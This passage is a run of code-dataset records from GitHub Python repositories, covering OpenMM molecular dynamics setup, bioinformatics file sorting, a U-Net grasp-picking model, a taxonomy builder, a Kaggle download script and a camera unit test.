pymongo.MongoClient(connection_string)\n # db = connection.anisopter\n # simulations = simulation_dao.SimulationDao(db)\n # simulations.save(sim)\n'''\n","repo_name":"juancarlosfarah/anisopter","sub_path":"src/pattern_recognition/pattern_recognition/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":11375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72005452645","text":"#!/usr/bin/env python3\nfrom Bash import mkdir_p\nfrom os import listdir\nfrom os import rename\nfrom os.path import join\nfrom os.path import basename\nfrom sys import argv\nfrom os.path import isfile\n# Script to enter large raw directory for Illumina data, then split the files\n# into sub-directories according to the first chunk of their names (the library\n# name). This facilitates read grouping and individual analysis of samples.\n\nexclusions = []\n\ndef main(directory):\n filenames = [x for x in listdir(directory) if isfile(join(directory, x))]\n\n for exclusion in exclusions:\n for filename in list(filenames):\n if exclusion in filename:\n filenames.remove(filename)\n\n libraries = list(set([basename(x).split(\"_\")[0] for x in filenames]))\n [mkdir_p(join(directory, f)) for f in libraries]\n\n for lib in libraries:\n for filename in filenames:\n if \"{}_\".format(lib) in filename:\n initial = join(directory, filename)\n library = join(directory, lib)\n final = join(library, filename)\n\n try:\n rename(initial, final)\n except Exception as err:\n print(err)\n\nif __name__ == \"__main__\":\n main(argv[1])\n","repo_name":"cacampbell/pythonmisc","sub_path":"to_libraries.py","file_name":"to_libraries.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13590965359","text":"\"\"\"\nmdsystem.py: Extends Modeller class from OpenMM with useful methods\n\nAuthor: Jack Greisman \n Ziyuan Zhao \n\"\"\"\n__author__ = \"Jack Greisman\"\n__version__ = \"1.1\"\n\nfrom simtk.unit import *\nfrom simtk.openmm import *\nfrom simtk.openmm.app import *\nimport mdtraj\nfrom mdtraj.reporters import HDF5Reporter\nimport numpy as np\nfrom mdtools.equilibration import equilibrate, calmdown\n\nclass MDSystem(Modeller):\n \"\"\"\n MDSystem extends the Modeller class, providing useful methods for \n preparing molecular systems for MD simulations in OpenMM.\n \"\"\"\n def __init__(self, topology, positions, forcefield):\n Modeller.__init__(self, topology, positions)\n self.forcefield = forcefield\n self.simulation = None\n self._NonbondedForceIndex = None\n self._more_reporters = False\n\n def _getIndexOfNonbondedForce(self, system=None):\n if not system:\n system = self.simulation.system\n if not self._NonbondedForceIndex:\n for i, force in enumerate(system.getForces()):\n if isinstance(force, NonbondedForce):\n self._NonbondedForceIndex = i\n break\n return self._NonbondedForceIndex \n\n \n def _toMDTrajTopology(self):\n \"\"\"\n Returns a MDTraj Topology object from the OpenMM Topology of \n this system. Importantly, it also ensures that the resSeq\n attribute is set. This is necessary to ensure that PDB-based\n residue numbering is not lost.\n\n Returns\n -------\n mdtrajtop : MDTraj.Topology\n MDTraj Topology object representing the system\n \"\"\"\n mdtrajtop = mdtraj.Topology.from_openmm(self.getTopology())\n for r1, r2 in zip(self.topology.residues(), mdtrajtop.residues):\n r2.resSeq = int(r1.id)\n return mdtrajtop\n\n def save(self, pdbfile):\n \"\"\"\n Save a PDB file representing this molecular system.\n\n Parameters\n ----------\n pdbfile : str\n PDB filename to which molecular system will be written\n \"\"\"\n with open(pdbfile, \"w\") as outfile:\n PDBFile.writeFile(self.topology, self.positions, outfile)\n return\n \n def findMolecules(self):\n \"\"\"\n Identify molecules based on bonded subsets of atoms.\n\n Returns\n -------\n molecules : list of sets of atoms\n Each entry represents one molecule, and is the set of all \n Atoms in that molecule\n \"\"\"\n mdtrajtop = self._toMDTrajTopology()\n return mdtrajtop.find_molecules()\n\n def select(self, selection):\n \"\"\"\n Select the atoms in the system that match the provided selection\n string. Uses the MDTraj syntax to define atom selections.\n\n Returns\n -------\n indices : np.ndarray\n Array of the indices of atoms matching the selection\n \"\"\"\n mdtrajtop = self._toMDTrajTopology()\n return mdtrajtop.select(selection)\n \n def buildSimulation(self, integrator=LangevinMiddleIntegrator, dt=0.002*picoseconds,\n temperature=298.15*kelvin, ensemble=\"NPT\", posre=False,\n posre_sel=\"not water and not (element Na or element Cl) and not element H\",\n efx=False, ef=(0,0,0), ef_sel=\"all\", nonbondedMethod=PME,\n nonbondedCutoff=1.*nanometer, constraints=HBonds, rigidWater=True, exceptions=[],\n filePrefix=\"traj\", saveTrajectory=False, trajInterval=500, saveVelocities=False,\n saveStateData=False, stateDataInterval=250, atomSubset=None, thermalize=True,\n hydrogenMass=1*amu, reporters=None):\n \"\"\"Build a simulation context from the system. The simulation is\n then available as an attribute.\n\n Parameters\n ----------\n integrator : Openmm Integrator, optional\n Integrator for computing the MD trajectory, by default LangevinMiddleIntegrator\n dt : simtk.Unit, optional\n Time step size for integration, by default 0.002*picoseconds\n temperature : simtk.Unit, optional\n Temperature for the thermostat, by default 298.15*kelvin\n ensemble : str, optional\n Statistical ensemble for the simulation, by default \"NPT\"\n posre : bool, optional\n Whether to apply position restraints (posre), by default False\n posre_sel : str, optional\n Rule for selecting atoms to apply the posre, by default \n \"not water and not (element Na or element Cl) and not element H\"\n efx : bool, optional\n Whether to apply electric field (EF) during simulation, by default False\n ef : tuple, optional\n Direction of the uniform EF, by default (0,0,0)\n ef_sel : str, optional\n Rule for selecting atoms that will feel the EF, by default \"all\"\n nonbondedMethod : OpenMM NonbondedForce, optional\n Model for nonbonded interactions between particles, by default PME\n nonbondedCutoff : simtk.Unit, optional\n Cutoff distance for nonbonded interactions, by default 1.*nanometer\n constraints : OpenmM Constraints, optional\n Constraints used for the simulation, by default HBonds\n rigidWater : bool, optional\n Whether to treat water molecules as rigid (e.g., 3-pt models), by default True\n exceptions : list, optional\n List of atoms that will be excluded from nonbonded forces treatment, \n by default []\n filePrefix : str, optional\n Prefix to the saved files, by default \"traj\"\n saveTrajectory : bool, optional\n Whether to save trajectory from simulation, by default False\n trajInterval : int, optional\n Frequency of saving trajectory specified as the number of frames in between, by default 500\n saveVelocities : bool, optional\n Whether to save velocity from simulation, by default False\n saveStateData : bool, optional\n Whether to save other state data from simulation, by default False\n stateDataInterval : int, optional\n Frequency of saving other state data, by default 250\n atomSubset : Any | None, optional\n Indices of the subset of atoms to record trajectory for, \n if None, all atoms will be recorded, by default None\n thermalize : bool, optional\n If True, initialize velocities according to Maxwell-Boltzmann \n distribution, by default True\n hydrogenMass : simtk.Unit, optional\n Hydrogen mass, by default 1*amu\n reporters : List, optional\n List of reporters for collecting any additional information, by default None.\n A reporter is defined as a 5-tuple of (filePrefix, offset, trajInterval, \n stateDataInterval, atomSubset)\n\n Returns\n -------\n mdtools.MDSystem\n Returns self, a modified MD system \n \"\"\"\n\n # If simulation exists, close any reporters\n if self.simulation is not None:\n for reporter in self.simulation.reporters:\n try:\n reporter.close()\n except:\n continue\n\n # Build system\n system = self.forcefield.createSystem(self.topology, nonbondedMethod=nonbondedMethod, \n nonbondedCutoff=nonbondedCutoff, \n constraints=constraints, rigidWater=rigidWater,\n hydrogenMass=hydrogenMass)\n\n # Setup MD simulation\n integrator = integrator(temperature, 1/picosecond, dt)\n\n # Add position restraints that can be tapered off during simulation\n if posre:\n force = CustomExternalForce(\"k*periodicdistance(x, y, z, x0, y0, z0)^2\")\n force.addGlobalParameter(\"k\", 5.0*kilocalories_per_mole/angstroms**2)\n force.addPerParticleParameter(\"x0\")\n force.addPerParticleParameter(\"y0\")\n force.addPerParticleParameter(\"z0\")\n for i in self.select(posre_sel):\n force.addParticle(int(i), self.positions[i].value_in_unit(nanometers))\n system.addForce(force)\n\n # Add external electric field (specified as potential energy)\n if efx:\n force = CustomExternalForce('(-1*Ex*charge*x)+(-1*Ey*charge*y)+(-1*Ez*charge*z)')\n force.addGlobalParameter(\"Ex\", ef[0])\n force.addGlobalParameter(\"Ey\", ef[1])\n force.addGlobalParameter(\"Ez\", ef[2])\n force.addPerParticleParameter(\"charge\")\n es_forces = system.getForce(self._getIndexOfNonbondedForce(system))\n system.addForce(force)\n for i in self.select(ef_sel):\n i = int(i)\n charge = es_forces.getParticleParameters(i)[0]\n force.addParticle(i, [charge])\n\n # Setup exceptions in nonbonded forces if provided\n nonbonded = system.getForce(self._getIndexOfNonbondedForce(system))\n for atom1, atom2 in exceptions:\n nonbonded.addException(int(atom1), int(atom2), 0.0, 0.0, 0.0, True)\n \n # Setup barostat for NPT ensemble\n if ensemble == \"NPT\":\n barostat = MonteCarloBarostat(1.0*bar, temperature, 25)\n system.addForce(barostat)\n\n # Add simulation\n self.simulation = Simulation(self.topology, system, integrator)\n \n # Initialize particle positions and velocities\n self.simulation.context.setPositions(self.positions)\n if thermalize:\n self.thermalize(temperature=temperature)\n \n # Add reporters\n # We extend its functionality to allow adding multiple reporters,\n # and each reporter can have a different offset when it starts collecting data\n if reporters is None:\n if saveTrajectory:\n self.simulation.reporters.append(HDF5Reporter(f\"{filePrefix}.h5\", trajInterval, atomSubset=atomSubset, velocities=saveVelocities))\n if saveStateData:\n self.simulation.reporters.append(StateDataReporter(f\"{filePrefix}.csv\", stateDataInterval, step=True, time=True, volume=True, totalEnergy=True, temperature=True, elapsedTime=True))\n self._more_reporters = False\n else: # we assume it is a list of tuples (filePrefix, offset, trajInterval, stateDataInterval, atomSubset)\n self.reporters = reporters\n self._more_reporters = True\n\n return self\n\n def thermalize(self, temperature, randomSeed=None):\n \"\"\"\n Set velocities of all particles to random values chosen from a \n Maxwell-Boltzmann distribution for the given temeprature. \n\n Parameters\n ----------\n temperature : float\n Temperature for which to sample velocities (Kelvin)\n randomSeed : int\n Seed for random number generator\n \"\"\"\n if randomSeed:\n return self.simulation.context.setVelocitiesToTemperature(temperature, randomSeed)\n else:\n return self.simulation.context.setVelocitiesToTemperature(temperature)\n\n def saveCheckpoint(self, filename):\n \"\"\"\n Save a checkpoint of the simulation to a file.\n\n Parameters\n ----------\n filename : str\n File to which checkpoint will be saved\n \"\"\"\n return self.simulation.saveCheckpoint(filename)\n\n def loadCheckpoint(self, filename):\n \"\"\"\n Load a checkpoint of the simulation from a file.\n\n Parameters\n ----------\n filename : str\n File from which checkpoint will be loaded\n \"\"\"\n return self.simulation.loadCheckpoint(filename)\n \n def minimize(self):\n \"\"\"\n Minimize the system using the simulation context. If a simulation\n context has not been built, an attribute error is raised.\n \"\"\"\n self.simulation.minimizeEnergy()\n\n # Update positions\n state = self.simulation.context.getState(getPositions=True)\n self.positions = state.getPositions()\n self.topology.setPeriodicBoxVectors(state.getPeriodicBoxVectors())\n \n return self\n\n def _time2steps(self, time):\n \"\"\"\n Compute the number of steps corresponding to a given chemical time\n \"\"\"\n if isinstance(time, int):\n return time\n else:\n chemtime = time.in_units_of(picoseconds)\n dt = self.simulation.integrator.getStepSize()\n return int(np.ceil(chemtime / dt))\n \n def simulate(self, n, outputStartingFrame=True, reportLargeForceThreshold=-1):\n \"\"\"\n Simulate the system for the given number of steps. If n is a \n simtk.Unit of time, the number of steps are chosen to simulate\n for the indicated chemical time. \n\n Parameters\n ----------\n n : int or simtk.unit\n Number of steps or chemical time of simulation\n outputStartingFrame : bool\n Whether to output the initial frame of a simulation\n reportLargeForceThreshold : int\n If <= 0, will not report; otherwise, print a list of\n all atoms with net forces on them exceeding the\n threshold in magnitude\n \"\"\"\n\n # If simulation step is 0, output the starting configuration\n if self.simulation.currentStep == 0 and outputStartingFrame:\n for reporter in self.simulation.reporters:\n report = reporter.describeNextReport(self.simulation)\n state = self.simulation.context.getState(*report[1:])\n reporter.report(self.simulation, state)\n n = self._time2steps(n)\n while n > 0:\n if self._more_reporters:\n next_offset = self._time2steps(self.reporters[0][1])\n n_steps = min(n, next_offset - self.simulation.currentStep)\n self.simulation.step(n_steps)\n print(next_offset, self.simulation.currentStep, n_steps)\n # Append new reporter to the list of reporters attached to the simulation if necessary\n filePrefix, offset, trajInterval, stateDataInterval, atomSubset = self.reporters.pop(0)\n # Requires rebuilding mdtraj\n if trajInterval > 0:\n self.simulation.reporters.append(HDF5Reporter(f\"{filePrefix}.h5\", trajInterval, atomSubset=atomSubset, startTime=self.simulation.currentStep))\n # This doesn't work as it currently stands!\n if stateDataInterval > 0:\n self.simulation.reporters.append(StateDataReporter(f\"{filePrefix}.csv\", stateDataInterval, step=True, time=True, volume=True, totalEnergy=True, temperature=True, elapsedTime=True))\n if len(self.reporters) == 0:\n self._more_reporters = False\n n -= n_steps\n else:\n self.simulation.step(n)\n n = 0\n\n # Optionally report large forces\n if reportLargeForceThreshold > 0:\n state = self.simulation.context.getState(getForces=True)\n netforces = np.linalg.norm(state.getForces(asNumpy=True), axis=1)\n indices = np.where(np.isnan(netforces) | (netforces > reportLargeForceThreshold))[0]\n atoms = list(self.topology.atoms())\n print(\"The following atoms experience large net forces exceeding the threshold\", reportLargeForceThreshold)\n [print(f\"{atoms[idx]}, net F = {netforces[idx]}\") for idx in indices]\n\n # Update positions\n state = self.simulation.context.getState(getPositions=True)\n self.positions = state.getPositions()\n self.topology.setPeriodicBoxVectors(state.getPeriodicBoxVectors())\n \n return self\n\n def equilibrate(self, simtime=1.*nanoseconds, temperature=300*kelvin, posre=True, reportLargeForceThreshold=-1):\n \"\"\"\n Minimizes and equilibrate an MDSystem object. If position restraints\n are applied, it will taper the restraints over the course of the \n simulation. This method assumes that MDSystem.buildSimulation() has\n already been called.\n\n Parameters\n ----------\n simtime : simtk.unit\n Total simulation time to use for equilibration\n temperature : OpenMM.unit.Quantity(unit=kelvin)\n Temperature to use to initialize velocities\n posre : bool\n If True, position restraints have been applied to simulation object\n reportLargeForceThreshold : int\n If <= 0, will not report; otherwise, print a list of\n all atoms with net forces on them exceeding the\n threshold in magnitude\n \"\"\"\n return equilibrate.equilibrate(self, simtime, temperature, posre, reportLargeForceThreshold=reportLargeForceThreshold)\n\n def calmdown(self, posre=True):\n \"\"\"\n Aggressive relaxation of a molecular system for MD system. \n \n Protocol:\n 1) Clashes/overlapping positions are identified, and their \n nonbonded interactions are excluded to prevent force \n overflows. \n 2) Brownian dynamics is then used to gently equilibrate the \n system using a very short time step and without constraints\n on hydrogens or water\n 3) The exceptions are then removed and Brownian dynamics is \n repeated with a slightly longer timestep, hydrogen constraints,\n and rigid waters\n 4) Finally, Langevin dynamics is simulated with a 2 fs timestep\n to ensure the simulation can be simulated.\n\n Parameters\n ----------\n posre : bool\n If true, position restraints are applied to non-water, \n non-ion heavy atoms in the system.\n \"\"\"\n return calmdown.calmdown( self, posre=posre)\n\n def getCharges(self, selection):\n \"\"\"\n Get partial charges associated with atoms in selections. \n\n Parameters\n ----------\n selection : str\n MDTraj-style atom selection string\n\n Returns\n -------\n np.ndarray\n Partial charges assigned by forcefield to atoms selected by\n selection string\n \"\"\"\n remove = False\n if self.simulation is None:\n self.buildSimulation()\n remove = True\n\n force = self.simulation.system.getForce(self._getIndexOfNonbondedForce())\n indices = self.select(selection)\n charges = [ force.getParticleParameters(int(i))[0].value_in_unit(elementary_charge) for i in indices ]\n\n if remove:\n self.simulation = None\n \n return np.array(charges)\n","repo_name":"Hekstra-Lab/mdtools","sub_path":"mdtools/prep/mdsystem.py","file_name":"mdsystem.py","file_ext":"py","file_size_in_byte":18994,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"41895406291","text":"def reverse(x):\n\tsign = [-1, 1][x < 0] \n\n\tmake_pos = abs(x)\n\n\tmake_s = str(make_pos)\n\n\tmake_reverse = make_s[::-1]\n\n\tmake_int = int(make_reverse)\n\n\treturn make_int \n\nprint(reverse(211))\n","repo_name":"rjorth/Algorithms-and-Data-Structures","sub_path":"reverseAnInteger.py","file_name":"reverseAnInteger.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36413600638","text":"from anytree import RenderTree, PostOrderIter, PreOrderIter\nimport Parser\nimport csv\nfrom preprocessing import *\n\nfrom pathlib import Path\nfrom tqdm import tqdm\nimport multiprocessing, pickle\n\nCREATE_CSV = True # create term-hypernym pairs based on taxonomy => save in csv file\nPRINT_TREE = True\nOUTPUT_DIR = \"trees_CPC8-2\"\n\ndef save_tree(root_node, file_name):\n with open(file_name, \"wb\") as outf:\n pickle.dump(root_node, outf)\n\ndef load_tree(file_name):\n with open(file_name, \"rb\") as inf:\n root_node = pickle.load(inf)\n return root_node\n\ndef get_root_node(file):\n name = file.split(\"_\")[0][-1]\n df = read_label_file(file)\n tree = build_tree(df)\n res_root = parser.get_taxonomy(tree.root, name) # could be slow for deep layers...\n print(f\"{name} done!\")\n return res_root, name \n\n\n\nif __name__ == '__main__':\n # create output directory if not exists\n output_path = Path(OUTPUT_DIR) \n output_path.mkdir(parents=True, exist_ok=True)\n\n tree_files = sorted([str(f) for f in output_path.glob(\"*.pickle\")])\n\n dict_trees = {}\n if len(tree_files) != 9: \n files_list = [str(f) for f in Path(\"cpc-titles\").glob(\"*.txt\")]\n already_done = [f\"cpc-titles/cpc-section-{str(f).split('/')[1].split('.')[0]}_20220201.txt\" for f in Path(OUTPUT_DIR).glob(\"*.txt\")]\n files_list = list(set(files_list) - set(already_done))\n\n parser = Parser.Parser()\n pool = multiprocessing.Pool(9)\n for res_root, name in pool.imap_unordered(get_root_node, files_list):\n save_tree(res_root, output_path / (name + '.pickle'))\n if PRINT_TREE:\n # print taxonomy tree in an text file\n output_file = output_path / (name + '.txt')\n with output_file.open('w') as out_f:\n for pre, _, node in RenderTree(res_root):\n out_f.write(\"%s%s\" % (pre, node.name))\n out_f.write(\"\\n\")\n\n if CREATE_CSV: # save term-hyponym pairs into csv file\n for f in tree_files:\n res_root = load_tree(f)\n dict_trees[str(f).split(\".\")[0].split(\"/\")[-1]] = res_root\n\n with open(\"hH.csv\", \"w\", newline='') as csv_f:\n writer = csv.writer(csv_f, delimiter=\"\\t\", quoting=csv.QUOTE_MINIMAL)\n for f, root_node in tqdm(dict_trees.items()):\n # in pre-order iteration of tree\n nodes = [node for node in PreOrderIter(root_node)]\n for node in nodes[2:]:\n writer.writerow([f, node.name, node.parent.name])\n","repo_name":"ZoeYou/AutoTaxo","sub_path":"tree2pairs.py","file_name":"tree2pairs.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33635796347","text":"\nimport random\nimport sys\nsys.path.insert(1, '..')\nfrom collections import namedtuple,OrderedDict\nfrom torch.distributions import Categorical\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torchvision\nimport sys\nimport numpy as np\nnp.set_printoptions(threshold=sys.maxsize)\n\nfrom ITRIP.Configuration import config\n\n\nprint (\"Using U_Net new picking \")\n\n\nclass DoubleConv(nn.Module):\n \"\"\"(convolution => [BN] => ReLU) * 2\"\"\"\n\n def __init__(self, in_channels, out_channels, mid_channels=None):\n super().__init__()\n if not mid_channels:\n mid_channels = out_channels\n self.double_conv = nn.Sequential(\n nn.Conv2d(in_channels, mid_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(mid_channels), nn.ReLU(inplace=True),\n nn.Conv2d(mid_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels), nn.ReLU(inplace=True))\n\n def forward(self, x):\n return self.double_conv(x)\n\n\nclass Down(nn.Module):\n \"\"\"Downscaling with maxpool then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.maxpool_conv = nn.Sequential(nn.MaxPool2d(2),\n DoubleConv(in_channels, out_channels))\n\n def forward(self, x):\n return self.maxpool_conv(x)\n\n\nclass Up(nn.Module):\n \"\"\"Upscaling then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels, bilinear=True):\n super().__init__()\n\n # if bilinear, use the normal convolutions to reduce the number of channels\n if bilinear:\n self.up = nn.Upsample(scale_factor=2,\n mode='bilinear',\n align_corners=True)\n self.conv = DoubleConv(in_channels, out_channels, in_channels // 2)\n else:\n self.up = nn.ConvTranspose2d(in_channels,\n in_channels // 2,\n kernel_size=2,\n stride=2)\n self.conv = DoubleConv(in_channels, out_channels)\n\n def forward(self, x1, x2):\n x1 = self.up(x1)\n # input is CHW\n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3]\n\n x1 = F.pad(\n x1,\n [diffX // 2, diffX - diffX // 2, diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return self.conv(x)\n\n\nclass NormalUp(nn.Module):\n \"\"\"Upscaling then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels, bilinear=True):\n super().__init__()\n\n # if bilinear, use the normal convolutions to reduce the number of channels\n if bilinear:\n self.up = nn.Upsample(scale_factor=2,\n mode='bilinear',\n align_corners=True)\n self.conv = DoubleConv(in_channels, out_channels, in_channels // 2)\n\n\n def forward(self, x):\n x = self.up(x)\n return self.conv(x)\n\nclass OutConv(nn.Module):\n\n def __init__(self, in_channels, out_channels):\n super(OutConv, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=1)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass conv_block(nn.Module):\n\n def __init__(self, ch_in, ch_out):\n super(conv_block, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(ch_in,\n ch_out,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=True),\n nn.BatchNorm2d(ch_out),\n nn.ReLU(inplace=True),\n nn.Conv2d(ch_out,\n ch_out,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=True),\n nn.BatchNorm2d(ch_out),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n x = self.conv(x)\n return x\n\n\nclass UNet(nn.Module):\n\n def __init__(self, n_channels, n_classes, bilinear=True):\n super(UNet, self).__init__()\n self.n_channels = n_channels\n self.n_classes = n_classes\n self.bilinear = bilinear\n\n self.inc = DoubleConv(n_channels, 32)\n self.down1 = Down(32, 64)\n self.down2 = Down(64, 128)\n self.down3 = Down(128, 256)\n factor = 2 if bilinear else 1\n self.down4 = Down(256, 512 // factor)\n self.up1 = Up(512, 256 // factor, bilinear)\n self.up2 = Up(256, 128 // factor, bilinear)\n self.up3 = Up(128, 64 // factor, bilinear)\n self.up4 = Up(64, n_classes, bilinear)\n\n# self.outc = OutConv(32, n_classes)\n\n def forward(self, x):\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n flatten = x5.reshape(x5.size(0), x5.size(1)*x5.size(2)*x5.size(3))\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n # logits = self.outc(x)\n return x,flatten\n\n\nclass SucModel(nn.Module):\n\n def __init__(self,modeObsevation, num_cls=1):\n super(SucModel, self).__init__()\n self.depth_norm = nn.InstanceNorm2d(1, affine=False)\n\n self.maxpool = nn.MaxPool2d(2)\n\n #self.CODs_trunk = UNet(8, 16)\n self.obs_trunk = UNet(config[\"inputChannel\"][modeObsevation], 16)\n\n self.head = nn.Sequential(\n conv_block(16+8, 32),\n conv_block(32, 64),\n nn.Conv2d(64, num_cls, 1),\n )\n\n self.valueOut = nn.Sequential(\n nn.Linear(65536+1, 64),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 64),\n nn.BatchNorm1d(64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 1)\n\n )\n\n def forward(self, des = None, obs=None,addData = 0, isEvaluation = False):\n input_shape = obs.shape[-2:]\n\n #depth = self.depth_norm(depth)\n if (obs is None):\n des_feature, des_flatten = self.CODs_trunk(des)\n feature = des_feature\n elif (des is None): \n obs = nn.InstanceNorm2d(1)(obs)\n obs_feature, obs_flatten = self.obs_trunk(obs)\n feature = obs_feature\n else:\n #des_feature, des_flatten = self.CODs_trunk(des)\n obs = nn.InstanceNorm2d(1)(obs)\n obs_feature, obs_flatten = self.obs_trunk(obs)\n #feature = torch.cat([des_feature, obs_feature], dim=1)\n feature = torch.cat([des, obs_feature], dim=1)\n\n pred = self.head(feature)\n #x1Flatten = pred.view(pred.size(0), -1)\n\n if input_shape != pred[-2:]:\n pred = F.interpolate(pred,\n size=input_shape,\n mode='bilinear',\n align_corners=True)\n\n value = torch.from_numpy(np.array([0])).cuda()\n if (not isEvaluation):\n addData = addData.view (addData.size(0),-1)\n \n if (des is None):\n x = torch.cat ((obs_flatten,addData),dim=1)\n elif (obs is None):\n x = torch.cat ((des_flatten,addData),dim=1)\n else:\n x = torch.cat ((obs_flatten,addData),dim=1)\n value = self.valueOut(x)\n\n pred = self.maxpool(pred)\n return pred.squeeze(1),value\n\nif __name__ == \"__main__\":\n batch_size = 8\n des = torch.randn(batch_size, 8, 256, 256)#.cuda()\n obs = torch.randn(batch_size, 4, 256, 256) # .cuda()\n addData = torch.randn(batch_size)\n hiNet = SucModel(\"D\",1)\n #hiNet.cuda()\n hiNet.train()\n\n pytorch_total_params = sum(p.numel() for p in hiNet.parameters() if p.requires_grad)\n print (pytorch_total_params ,\"params\")\n predPos, value = hiNet(des,obs,addData)\n print ( predPos.shape)\n print(value.squeeze())\n","repo_name":"hgiangcao/CODs","sub_path":"CODs_Picking/UNetPicking.py","file_name":"UNetPicking.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"26067688303","text":"import os\r\nimport kaggle\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport requests\r\nfrom requests import HTTPError\r\n\r\n# The API from where we are trying to call the dataset\r\ndomain = \"data_url\"\r\n\r\n# Printing the domian and session details\r\nprint(\"Domain: {domain:}\\nSession: {session:}\\nURI Prefix: {uri_prefix:}\".format(**client.__dict__))\r\n\r\n# Call the api_token for kaggle\r\napp_id = os.environ.get(\"KAGGLE_USERNAME\")\r\napp_key = os.environ.get(\"KAGGLE_TOKEN\")\r\n\r\n# The local path where the data set is saved.\r\nlocal_filename = \"file_name\"\r\n\r\n# Kaggle Username and Password\r\nkaggle_info = {'UserName': app_id, 'Password': app_key}\r\n\r\n# Attempts to download the CSV file. Gets rejected because we are not logged in.\r\nr = requests.get(domain)\r\n\r\n# Login to Kaggle and retrieve the data.\r\nr = requests.post(r.url, data = kaggle_info, prefetch = False)\r\n\r\n# Writes the data to a local file one chunk at a time.\r\nf = open(local_filename, 'w')\r\n\r\n# Reads 512KB at a time into memory\r\nfor chunk in r.iter_content(chunk_size = 512 * 1024): \r\n if chunk: \r\n # filter out keep-alive new chunks\r\n f.write(chunk)\r\nf.close()\r\n\r\n# Utility methods for exception handling\r\ndef raise_for_status(response):\r\n\r\n # Custom raise_for_status with more appropriate error message.\r\n http_error_msg = \"\"\r\n\r\n if 400 <= response.status_code < 500:\r\n http_error_msg = \"{0} Client Error: {1}\".format(\r\n response.status_code, response.reason\r\n )\r\n\r\n elif 500 <= response.status_code < 600:\r\n http_error_msg = \"{0} Server Error: {1}\".format(\r\n response.status_code, response.reason\r\n )\r\n\r\n if http_error_msg:\r\n try:\r\n more_info = response.json().get(\"message\")\r\n except ValueError:\r\n more_info = None\r\n if more_info and more_info.lower() != response.reason.lower():\r\n http_error_msg += \".\\n\\t{0}\".format(more_info)\r\n raise requests.exceptions.HTTPError(http_error_msg, response=response) \r\n","repo_name":"tanaymukherjee/Dissecting-Yelp-Dataset","sub_path":"Script/src/bigdata1/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29564596840","text":"import unittest\nimport numpy as np\nfrom pathlib import Path\nfrom calibpy.Camera import Camera\n\n\nclass TestCameraModule(unittest.TestCase):\n\n def setUp(self):\n print(\"start Camera tests...\")\n self._root = Path.cwd() / \"tests\" / \"data\"\n\n def test_consistency(self):\n print(\"test_consistency...\")\n cam = Camera()\n cam.quick_init()\n self.assertEqual(cam.f_mm, 50)\n self.assertEqual(cam.sensor_size_mm, (20.25, 36))\n self.assertEqual(cam.image_size, (1080, 1920))\n self.assertTrue(np.all(cam.distortion) == 0)\n\n ref = np.array([[2666.6666666666666666666666666667, 0, 960],\n [0, 2666.6666666666666666666666666667, 540],\n [0, 0, 1]])\n np.testing.assert_almost_equal(ref, cam.intrinsics)\n\n ref = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n np.testing.assert_almost_equal(ref, cam.RT)\n\n ref = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n np.testing.assert_almost_equal(ref, cam.RTb)\n\n def test_serializing(self):\n print(\"test_serializing...\")\n dump_fname = str(self._root / \"test.npy\")\n cam = Camera()\n cam.quick_init()\n cam.serialize(dump_fname)\n cam2 = Camera()\n cam2.load(dump_fname)\n np.testing.assert_array_almost_equal(cam.intrinsics, cam2.intrinsics)\n np.testing.assert_array_almost_equal(cam.RT, cam2.RT)\n np.testing.assert_array_almost_equal(cam.RTb, cam2.RTb)\n self.assertEqual(cam.f_mm, cam2.f_mm)\n self.assertEqual(cam.sensor_size_mm, cam2.sensor_size_mm)\n self.assertEqual(cam.image_size, cam2.image_size)\n\n import os\n os.remove(dump_fname)\n\n\nif __name__ == '__main__':\n 